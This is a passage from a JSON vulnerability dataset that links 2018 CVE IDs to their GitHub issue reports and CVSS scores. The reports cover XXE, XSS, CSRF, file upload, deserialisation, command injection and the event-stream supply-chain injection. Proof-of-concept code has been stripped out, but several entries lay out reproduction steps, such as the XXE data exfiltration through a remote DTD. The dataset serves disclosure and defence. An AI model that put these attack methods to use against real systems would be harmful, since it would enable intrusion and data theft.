  17374. "Repo_new": "bludit/bludit",
  17375. "Issue_Created_At": "2018-10-02T18:30:47Z",
  17376. "description": "Arbitrary File Upload Security. Hi There, I was trying the application for a while and noticed that a regular user ( Editor role ) can upload an arbitrary file, in this case a PHP file. They can then execute PHP code remotely in the context of the web server process. Is it OK to describe the vulnerability here? Or do you prefer that I send it in private? Thanks.",
  17377. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  17378. "severity": "HIGH",
  17379. "baseScore": 8.8,
  17380. "impactScore": 5.9,
  17381. "exploitabilityScore": 2.8
  17382. },
  17383. {
  17384. "CVE_ID": "CVE-2018-1000814",
  17385. "Issue_Url_old": "https://github.com/aio-libs/aiohttp-session/issues/325",
  17386. "Issue_Url_new": "https://github.com/aio-libs/aiohttp-session/issues/325",
  17387. "Repo_new": "aio-libs/aiohttp-session",
  17388. "Issue_Created_At": "2018-10-08T19:29:39Z",
  17389. "description": "Improper Session Expiration in storages with no inherent expiration. Storages that lack inherent data expiration APITAG APITAG (out of scope, it's inherently insecure) APITAG appear to do improper Session Expiration. A user that has obtained a legitimate session can perform a replay attack by recreating his / her cookie (with the same value as the original), thus defeating the purpose of cookie expiry. The browser's cookie expiry is advisory only: a client can always resend a cookie it has saved, so expiry has to be enforced on the server side inside the session data itself. This impacts security in the sense that it increases the attack window for session attacks, practically providing tokens with an infinite lifespan. This falls under OWASP's OTG SESS NUMBERTAG URLTAG APITAG Session Timeout) test and more specifically under the 'ensuring that it is not possible to \u201creuse\u201d the same session' clause. APITAG Using a slight variation of APITAG : ERRORTAG And a client that logs in, saves the value of the cookie and re-creates it after expiry: ERRORTAG Running both will result in the following output on the client: ERRORTAG The above shows that the expired session was successfully used simply by re-creating the cookie. Remedy For fernet, the documentation URLTAG indicates that there is a ttl option to decrypt that should suffice. I am preparing a PR for this. Unfortunately I couldn't find anything related for APITAG My only thought on this is to add the creation time in the message itself for APITAG and check it on load_session (maybe issue a warning if an expired token was presented). I would like some feedback / thoughts on this.",
  17390. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  17391. "severity": "MEDIUM",
  17392. "baseScore": 6.5,
  17393. "impactScore": 3.6,
  17394. "exploitabilityScore": 2.8
  17395. },
  17396. {
  17397. "CVE_ID": "CVE-2018-1000815",
  17398. "Issue_Url_old": "https://github.com/brave/browser-laptop/issues/15232",
  17399. "Issue_Url_new": "https://github.com/brave/browser-laptop/issues/15232",
  17400. "Repo_new": "brave/browser-laptop",
  17401. "Issue_Created_At": "2018-09-26T20:35:59Z",
  17402. "description": "[hackerone NUMBERTAG] noscript issue. URLTAG verified in latest release",
  17403. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
  17404. "severity": "MEDIUM",
  17405. "baseScore": 4.3,
  17406. "impactScore": 1.4,
  17407. "exploitabilityScore": 2.8
  17408. },
  17409. {
  17410. "CVE_ID": "CVE-2018-1000816",
  17411. "Issue_Url_old": "https://github.com/grafana/grafana/issues/13667",
  17412. "Issue_Url_new": "https://github.com/grafana/grafana/issues/13667",
  17413. "Repo_new": "grafana/grafana",
  17414. "Issue_Created_At": "2018-10-14T14:55:27Z",
  17415. "description": "stored xss in grafana query editor. Dear Grafana Team \u2013 I have found a persistent xss in Grafana's query editor for Graphite and Influxdb. The xss is triggered when clicking the field in the query editor's \"FROM\" row in which the payload NUMBERTAG was previously inserted. I verified this vulnerability on version NUMBERTAG and version NUMBERTAG both on Ubuntu NUMBERTAG I attached this short screencast to make it easy to reproduce the behaviour APITAG Grafana APITAG URLTAG NUMBERTAG APITAG",
  17416. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  17417. "severity": "MEDIUM",
  17418. "baseScore": 5.4,
  17419. "impactScore": 2.7,
  17420. "exploitabilityScore": 2.3
  17421. },
  17422. {
  17423. "CVE_ID": "CVE-2018-1000817",
  17424. "Issue_Url_old": "https://github.com/grails/grails-core/issues/11068",
  17425. "Issue_Url_new": "https://github.com/grails/grails-core/issues/11068",
  17426. "Repo_new": "grails/grails-core",
  17427. "Issue_Created_At": "2018-08-17T09:45:15Z",
  17428. "description": "File reading vulnerability. Hi, grails has a file reading vulnerability which can read the source code (Java bytecode) of affected applications. This flaw requires the Grails application to be packaged as a WAR and to be running on Jetty. Reproduce NUMBERTAG Create a helloworld application and a helloworld controller NUMBERTAG Modify APITAG line NUMBERTAG from APITAG to APITAG NUMBERTAG Build a war file NUMBERTAG Deploy the application to jetty NUMBERTAG Send a crafted request: APITAG . Expected Behaviour ERRORTAG or NUMBERTAG Actual Behaviour FILETAG Environment Information Operating System : Windows Grails Version: the latest version JDK Version NUMBERTAG",
  17429. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  17430. "severity": "HIGH",
  17431. "baseScore": 7.5,
  17432. "impactScore": 3.6,
  17433. "exploitabilityScore": 3.9
  17434. },
  17435. {
  17436. "CVE_ID": "CVE-2018-1000821",
  17437. "Issue_Url_old": "https://github.com/mkulesh/microMathematics/issues/79",
  17438. "Issue_Url_new": "https://github.com/mkulesh/micromathematics/issues/79",
  17439. "Repo_new": "mkulesh/micromathematics",
  17440. "Issue_Created_At": "2018-09-29T09:32:28Z",
  17441. "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG",
  17442. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17443. "severity": "CRITICAL",
  17444. "baseScore": 10.0,
  17445. "impactScore": 6.0,
  17446. "exploitabilityScore": 3.9
  17447. },
  17448. {
  17449. "CVE_ID": "CVE-2018-1000822",
  17450. "Issue_Url_old": "https://github.com/codelibs/fess/issues/1851",
  17451. "Issue_Url_new": "https://github.com/codelibs/fess/issues/1851",
  17452. "Repo_new": "codelibs/fess",
  17453. "Issue_Created_At": "2018-09-29T09:59:12Z",
  17454. "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG",
  17455. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17456. "severity": "CRITICAL",
  17457. "baseScore": 10.0,
  17458. "impactScore": 6.0,
  17459. "exploitabilityScore": 3.9
  17460. },
  17461. {
  17462. "CVE_ID": "CVE-2018-1000823",
  17463. "Issue_Url_old": "https://github.com/eXist-db/exist/issues/2180",
  17464. "Issue_Url_new": "https://github.com/exist-db/exist/issues/2180",
  17465. "Repo_new": "exist-db/exist",
  17466. "Issue_Created_At": "2018-09-29T10:37:37Z",
  17467. "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG The insecure XML parsing is used within the REST server in the following code: URLTAG",
  17468. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17469. "severity": "CRITICAL",
  17470. "baseScore": 10.0,
  17471. "impactScore": 6.0,
  17472. "exploitabilityScore": 3.9
  17473. },
  17474. {
  17475. "CVE_ID": "CVE-2018-1000824",
  17476. "Issue_Url_old": "https://github.com/MegaMek/megamek/issues/1162",
  17477. "Issue_Url_new": "https://github.com/megamek/megamek/issues/1162",
  17478. "Repo_new": "megamek/megamek",
  17479. "Issue_Created_At": "2018-09-29T13:10:17Z",
  17480. "description": "Object Deserialisation Vulnerability in APITAG The Issue Object Deserialization Injection attacks utilise overly trusted user controlled input, passed to deserialisation functions. The deserialisation of objects can trigger certain methods within the object, allowing the attacker to perform unauthorised actions like execution of code, disclosure of information, etc. Where the Issue Occurred Displayed below is the code within the APITAG project, where the user input is passed into the deserialisation function: URLTAG The above code can be manipulated by specially crafted network packets.",
  17481. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17482. "severity": "CRITICAL",
  17483. "baseScore": 9.8,
  17484. "impactScore": 5.9,
  17485. "exploitabilityScore": 3.9
  17486. },
  17487. {
  17488. "CVE_ID": "CVE-2018-1000825",
  17489. "Issue_Url_old": "https://github.com/FreeCol/freecol/issues/26",
  17490. "Issue_Url_new": "https://github.com/freecol/freecol/issues/26",
  17491. "Repo_new": "freecol/freecol",
  17492. "Issue_Created_At": "2018-09-29T13:28:33Z",
  17493. "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG Remediation URLTAG",
  17494. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17495. "severity": "CRITICAL",
  17496. "baseScore": 10.0,
  17497. "impactScore": 6.0,
  17498. "exploitabilityScore": 3.9
  17499. },
  17500. {
  17501. "CVE_ID": "CVE-2018-1000826",
  17502. "Issue_Url_old": "https://github.com/microweber/microweber/issues/489",
  17503. "Issue_Url_new": "https://github.com/microweber/microweber/issues/489",
  17504. "Repo_new": "microweber/microweber",
  17505. "Issue_Created_At": "2018-09-29T14:47:53Z",
  17506. "description": "XSS in FILETAG . The Issue Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim\u2019s browser. This may lead to unauthorised actions being performed, unauthorised access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. Where the Issue Occurred The code below displays the user controlled variable without sufficient sanitisation: URLTAG",
  17507. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17508. "severity": "MEDIUM",
  17509. "baseScore": 6.1,
  17510. "impactScore": 2.7,
  17511. "exploitabilityScore": 2.8
  17512. },
  17513. {
  17514. "CVE_ID": "CVE-2018-1000827",
  17515. "Issue_Url_old": "https://github.com/nightflyza/Ubilling/issues/330",
  17516. "Issue_Url_new": "https://github.com/nightflyza/ubilling/issues/330",
  17517. "Repo_new": "nightflyza/ubilling",
  17518. "Issue_Created_At": "2018-09-29T14:53:07Z",
  17519. "description": "Object Deserialisation Vulnerability in FILETAG . The Issue Object Deserialization Injection attacks utilise overly trusted user controlled input, passed to deserialisation functions. The deserialisation of objects can trigger certain methods within the object, allowing the attacker to perform unauthorised actions like execution of code, disclosure of information, etc. Where the Issue Occurred Displayed below is the code where the user input is passed into the deserialisation function: URLTAG",
  17520. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17521. "severity": "CRITICAL",
  17522. "baseScore": 9.8,
  17523. "impactScore": 5.9,
  17524. "exploitabilityScore": 3.9
  17525. },
  17526. {
  17527. "CVE_ID": "CVE-2018-1000828",
  17528. "Issue_Url_old": "https://github.com/frostwire/frostwire/issues/829",
  17529. "Issue_Url_new": "https://github.com/frostwire/frostwire/issues/829",
  17530. "Repo_new": "frostwire/frostwire",
  17531. "Issue_Created_At": "2018-09-29T15:04:55Z",
  17532. "description": "XXE in APITAG via Man in the Middle APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG An attacker can Man in the Middle APITAG the HTTP call to the URL below: URLTAG Remediation URLTAG",
  17533. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17534. "severity": "CRITICAL",
  17535. "baseScore": 9.0,
  17536. "impactScore": 6.0,
  17537. "exploitabilityScore": 2.2
  17538. },
  17539. {
  17540. "CVE_ID": "CVE-2018-1000829",
  17541. "Issue_Url_old": "https://github.com/dmsl/anyplace/issues/263",
  17542. "Issue_Url_new": "https://github.com/dmsl/anyplace/issues/263",
  17543. "Repo_new": "dmsl/anyplace",
  17544. "Issue_Created_At": "2018-09-30T02:47:20Z",
  17545. "description": "XXE in APITAG via Man in the Middle APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of APITAG without securely disabling entities: URLTAG An attacker can Man in the Middle APITAG the HTTP call to the URL below: URLTAG",
  17546. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17547. "severity": "CRITICAL",
  17548. "baseScore": 9.0,
  17549. "impactScore": 6.0,
  17550. "exploitabilityScore": 2.2
  17551. },
  17552. {
  17553. "CVE_ID": "CVE-2018-1000830",
  17554. "Issue_Url_old": "https://github.com/goxr3plus/XR3Player/issues/9",
  17555. "Issue_Url_new": "https://github.com/goxr3plus/xr3player/issues/9",
  17556. "Repo_new": "goxr3plus/xr3player",
  17557. "Issue_Created_At": "2018-10-24T11:05:34Z",
  17558. "description": "XXE in Playlist Parsers. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of documentbuilderfactory without securely disabling entities: URLTAG Remediation URLTAG",
  17559. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17560. "severity": "CRITICAL",
  17561. "baseScore": 10.0,
  17562. "impactScore": 6.0,
  17563. "exploitabilityScore": 3.9
  17564. },
  17565. {
  17566. "CVE_ID": "CVE-2018-1000831",
  17567. "Issue_Url_old": "https://github.com/k9mail/k-9/issues/3681",
  17568. "Issue_Url_new": "https://github.com/thundernest/k-9/issues/3681",
  17569. "Repo_new": "thundernest/k-9",
  17570. "Issue_Created_At": "2018-10-24T11:12:53Z",
  17571. "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred The following code snippets display the usage of saxparserfactory without securely disabling entities: URLTAG Remediation URLTAG",
  17572. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17573. "severity": "CRITICAL",
  17574. "baseScore": 10.0,
  17575. "impactScore": 6.0,
  17576. "exploitabilityScore": 3.9
  17577. },
  17578. {
  17579. "CVE_ID": "CVE-2018-1000832",
  17580. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2271",
  17581. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2271",
  17582. "Repo_new": "zoneminder/zoneminder",
  17583. "Issue_Created_At": "2018-10-24T11:29:17Z",
  17584. "description": "Command Injection in FILETAG . The Issue Command injection is an attack which uses overly trusting user controlled input, when performing operating system commands from within the application. This allows an attacker to perform unauthorised operating system commands on the target server. Where the Issue Occurred URLTAG Remediation URLTAG",
  17585. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17586. "severity": "CRITICAL",
  17587. "baseScore": 9.8,
  17588. "impactScore": 5.9,
  17589. "exploitabilityScore": 3.9
  17590. },
  17591. {
  17592. "CVE_ID": "CVE-2018-1000833",
  17593. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2272",
  17594. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2272",
  17595. "Repo_new": "zoneminder/zoneminder",
  17596. "Issue_Created_At": "2018-10-24T11:31:14Z",
  17597. "description": "Command Injection in FILETAG . The Issue Command injection is an attack which uses overly trusting user controlled input, when performing operating system commands from within the application. This allows an attacker to perform unauthorised operating system commands on the target server. Where the Issue Occurred: URLTAG Remediation URLTAG",
  17598. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17599. "severity": "CRITICAL",
  17600. "baseScore": 9.8,
  17601. "impactScore": 5.9,
  17602. "exploitabilityScore": 3.9
  17603. },
  17604. {
  17605. "CVE_ID": "CVE-2018-1000834",
  17606. "Issue_Url_old": "https://github.com/runelite/runelite/issues/6160",
  17607. "Issue_Url_new": "https://github.com/runelite/runelite/issues/6160",
  17608. "Repo_new": "runelite/runelite",
  17609. "Issue_Created_At": "2018-10-24T11:43:43Z",
  17610. "description": "XXE via Man in the Middle in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred: Insecure XML parsers are used below: URLTAG Communication over plain HTTP may allow an on-path attacker to modify the server's response and perform XXE attacks against the client. The HTTP URL is displayed below: URLTAG Remediation Perform communications over HTTPS, and additionally configure the XML parsers to disallow DTDs and external entity resolution: TLS only removes the on-path attacker, whereas a hardened parser also protects against a malicious or compromised server.",
  17611. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17612. "severity": "CRITICAL",
  17613. "baseScore": 9.0,
  17614. "impactScore": 6.0,
  17615. "exploitabilityScore": 2.2
  17616. },
  17617. {
  17618. "CVE_ID": "CVE-2018-1000835",
  17619. "Issue_Url_old": "https://github.com/Kunzisoft/KeePassDX/issues/200",
  17620. "Issue_Url_new": "https://github.com/kunzisoft/keepassdx/issues/200",
  17621. "Repo_new": "kunzisoft/keepassdx",
  17622. "Issue_Created_At": "2018-10-24T11:48:44Z",
  17623. "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred: URLTAG Remediation URLTAG",
  17624. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17625. "severity": "CRITICAL",
  17626. "baseScore": 10.0,
  17627. "impactScore": 6.0,
  17628. "exploitabilityScore": 3.9
  17629. },
  17630. {
  17631. "CVE_ID": "CVE-2018-1000836",
  17632. "Issue_Url_old": "https://github.com/Bedework/bw-calendar-engine/issues/3",
  17633. "Issue_Url_new": "https://github.com/bedework/bw-calendar-engine/issues/3",
  17634. "Repo_new": "bedework/bw-calendar-engine",
  17635. "Issue_Created_At": "2018-10-24T11:54:22Z",
  17636. "description": "XXE via APITAG / Malicious Server in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred URLTAG Remediation URLTAG",
  17637. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17638. "severity": "CRITICAL",
  17639. "baseScore": 9.0,
  17640. "impactScore": 6.0,
  17641. "exploitabilityScore": 2.2
  17642. },
  17643. {
  17644. "CVE_ID": "CVE-2018-1000837",
  17645. "Issue_Url_old": "https://github.com/ObeoNetwork/UML-Designer/issues/1035",
  17646. "Issue_Url_new": "https://github.com/obeonetwork/uml-designer/issues/1035",
  17647. "Repo_new": "obeonetwork/uml-designer",
  17648. "Issue_Created_At": "2018-10-24T11:58:27Z",
  17649. "description": "XXE in APITAG via FILETAG file. The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred URLTAG Remediation URLTAG",
  17650. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17651. "severity": "CRITICAL",
  17652. "baseScore": 10.0,
  17653. "impactScore": 6.0,
  17654. "exploitabilityScore": 3.9
  17655. },
  17656. {
  17657. "CVE_ID": "CVE-2018-1000838",
  17658. "Issue_Url_old": "https://github.com/sleuthkit/autopsy/issues/4236",
  17659. "Issue_Url_new": "https://github.com/sleuthkit/autopsy/issues/4236",
  17660. "Repo_new": "sleuthkit/autopsy",
  17661. "Issue_Created_At": "2018-10-25T04:59:50Z",
  17662. "description": "XXE in APITAG The Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Where the Issue Occurred: URLTAG Remediation URLTAG",
  17663. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  17664. "severity": "CRITICAL",
  17665. "baseScore": 10.0,
  17666. "impactScore": 6.0,
  17667. "exploitabilityScore": 3.9
  17668. },
  17669. {
  17670. "CVE_ID": "CVE-2018-1000839",
  17671. "Issue_Url_old": "https://github.com/LibreHealthIO/lh-ehr/issues/1223",
  17672. "Issue_Url_new": "https://github.com/librehealthio/lh-ehr/issues/1223",
  17673. "Repo_new": "librehealthio/lh-ehr",
  17674. "Issue_Created_At": "2018-08-11T06:30:11Z",
  17675. "description": "Security issue: Remote code execution via user picture upload. The Issue Arbitrary file upload vulnerability allowing any user who can set profile pictures to be able to execute code on the hosting system. In lh ehr, an attacker must be authenticated, and have sufficient privileges to upload a user profile picture (either for a user, or a patient) to perform this attack. It appears any valid user can perform this. Issue location Occurs at URLTAG POC: ERRORTAG CODETAG",
  17676. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  17677. "severity": "HIGH",
  17678. "baseScore": 8.8,
  17679. "impactScore": 5.9,
  17680. "exploitabilityScore": 2.8
  17681. },
  17682. {
  17683. "CVE_ID": "CVE-2018-1000840",
  17684. "Issue_Url_old": "https://github.com/processing/processing/issues/5706",
  17685. "Issue_Url_new": "https://github.com/processing/processing/issues/5706",
  17686. "Repo_new": "processing/processing",
  17687. "Issue_Created_At": "2018-11-13T15:42:43Z",
  17688. "description": "XXE in APITAG . Issue An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, since it allows arbitrary file inclusion in the XML and the automated issuing of HTTP requests (which can be used to exfiltrate the included data) during the parsing of the XML. Steps to reproduce Example Processing script CODETAG Example XML file CODETAG Example remote DTD (as stored at the url referenced above) CODETAG Further clarification The proof of concept provided above retrieves the DTD specification from the remote server. During the execution of APITAG the DTD is then parsed, reading in the example the content of PATHTAG The content of the file is then transmitted through an HTTP request (row NUMBERTAG of the DTD) to the remote server, which returns the content of $_REQUEST, producing the console output. Remediation URLTAG URLTAG",
  17689. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  17690. "severity": "MEDIUM",
  17691. "baseScore": 6.5,
  17692. "impactScore": 3.6,
  17693. "exploitabilityScore": 2.8
  17694. },
  17695. {
  17696. "CVE_ID": "CVE-2018-1000842",
  17697. "Issue_Url_old": "https://github.com/asteinhauser/fat_free_crm/issues/1",
  17698. "Issue_Url_new": "https://github.com/asteinhauser/fat_free_crm/issues/1",
  17699. "Repo_new": "asteinhauser/fat_free_crm",
  17700. "Issue_Created_At": "2018-10-26T23:58:10Z",
  17701. "description": "Context sensitive XSS discovery. FILETAG",
  17702. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17703. "severity": "MEDIUM",
  17704. "baseScore": 6.1,
  17705. "impactScore": 2.7,
  17706. "exploitabilityScore": 2.8
  17707. },
  17708. {
  17709. "CVE_ID": "CVE-2018-1000846",
  17710. "Issue_Url_old": "https://github.com/funzoneq/freshdns/issues/7",
  17711. "Issue_Url_new": "https://github.com/funzoneq/freshdns/issues/7",
  17712. "Repo_new": "funzoneq/freshdns",
  17713. "Issue_Created_At": "2018-11-07T18:03:34Z",
  17714. "description": "XSRF vulnerability. I noticed that APITAG is vulnerable to Cross Site Request Forgery URLTAG , allowing an attacker to e.g. delete all zones on your server if they can get you to load a website containing their javascript while you're logged in to APITAG in the same browser. It is fixed (hopefully) in my merge request NUMBERTAG",
  17715. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  17716. "severity": "HIGH",
  17717. "baseScore": 8.8,
  17718. "impactScore": 5.9,
  17719. "exploitabilityScore": 2.8
  17720. },
  17721. {
  17722. "CVE_ID": "CVE-2018-1000847",
  17723. "Issue_Url_old": "https://github.com/funzoneq/freshdns/issues/16",
  17724. "Issue_Url_new": "https://github.com/funzoneq/freshdns/issues/16",
  17725. "Repo_new": "funzoneq/freshdns",
  17726. "Issue_Created_At": "2018-11-14T21:12:24Z",
  17727. "description": "XSS vulnerability. I tried to fix all XSS vulnerabilities in commit APITAG hopefully I found all problematic places but probably I lost some. An user could have put something like APITAG in their username. As soon as the admin opens the User List, the script code would be run within the admin's session.",
  17728. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  17729. "severity": "MEDIUM",
  17730. "baseScore": 5.4,
  17731. "impactScore": 2.7,
  17732. "exploitabilityScore": 2.3
  17733. },
  17734. {
  17735. "CVE_ID": "CVE-2018-1000851",
  17736. "Issue_Url_old": "https://github.com/bitpay/copay/issues/9346",
  17737. "Issue_Url_new": "https://github.com/bitpay/copay/issues/9346",
  17738. "Repo_new": "bitpay/copay",
  17739. "Issue_Created_At": "2018-11-26T18:36:52Z",
  17740. "description": "APITAG dependency attack steals wallets from users of copay. URLTAG",
  17741. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17742. "severity": "CRITICAL",
  17743. "baseScore": 9.8,
  17744. "impactScore": 5.9,
  17745. "exploitabilityScore": 3.9
  17746. },
  17747. {
  17748. "CVE_ID": "CVE-2018-1000851",
  17749. "Issue_Url_old": "https://github.com/dominictarr/event-stream/issues/116",
  17750. "Issue_Url_new": "https://github.com/dominictarr/event-stream/issues/116",
  17751. "Repo_new": "dominictarr/event-stream",
  17752. "Issue_Created_At": "2018-11-20T21:26:01Z",
  17753. "description": "I don't know what to say.. MENTIONTAG Why was MENTIONTAG given access to this repo? He added flatmap stream URLTAG which is entirely NUMBERTAG commit to the repo but has NUMBERTAG ersions, the latest one removes the injection, unmaintained, created NUMBERTAG months ago) an injection targeting ps tree URLTAG . After he adds it at almost the exact same time the injection is added to APITAG , he bumps the version and publishes. Literally the second commit NUMBERTAG days later) after that he removes the injection and bumps a major version so he can clear the repo of having APITAG but still have everyone (millions of weekly installs) using NUMBERTAG affected. MENTIONTAG If you removed flatmap stream because your realized it was an injection attack why didn't you yank APITAG from npm and put a PSA? If you didn't know, why did you choose to use a completely unused/unknown library NUMBERTAG downloads on npm until you use it)? If I had the exact date from npm in which APITAG was published I wouldn't be asking you questions. I've included a break down of what I have so far on APITAG below. It includes the portion of code not found in the unminified source of APITAG but found in the minified source. The code has been cleaned up a little to get a better understanding. The worst part is I still don't even know what this does... The decrypted data n NUMBERTAG is byte code or something, not regular javascript, or maybe I'm just not handling it correctly. ERRORTAG",
  17754. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17755. "severity": "CRITICAL",
  17756. "baseScore": 9.8,
  17757. "impactScore": 5.9,
  17758. "exploitabilityScore": 3.9
  17759. },
  17760. {
  17761. "CVE_ID": "CVE-2018-1000852",
  17762. "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/4866",
  17763. "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/4866",
  17764. "Repo_new": "freerdp/freerdp",
  17765. "Issue_Created_At": "2018-09-19T05:11:35Z",
  17766. "description": "I Found Memory Leak Vulnerability. freerdp NUMBERTAG rc3 has a memory leak vulnerability that can read the client's memory. This vulnerability occurs in channels / drdynvc / client / drdynvc_main.c. Please email me if you need more details. EMAILTAG",
  17767. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
  17768. "severity": "MEDIUM",
  17769. "baseScore": 6.5,
  17770. "impactScore": 2.5,
  17771. "exploitabilityScore": 3.9
  17772. },
  17773. {
  17774. "CVE_ID": "CVE-2018-1000854",
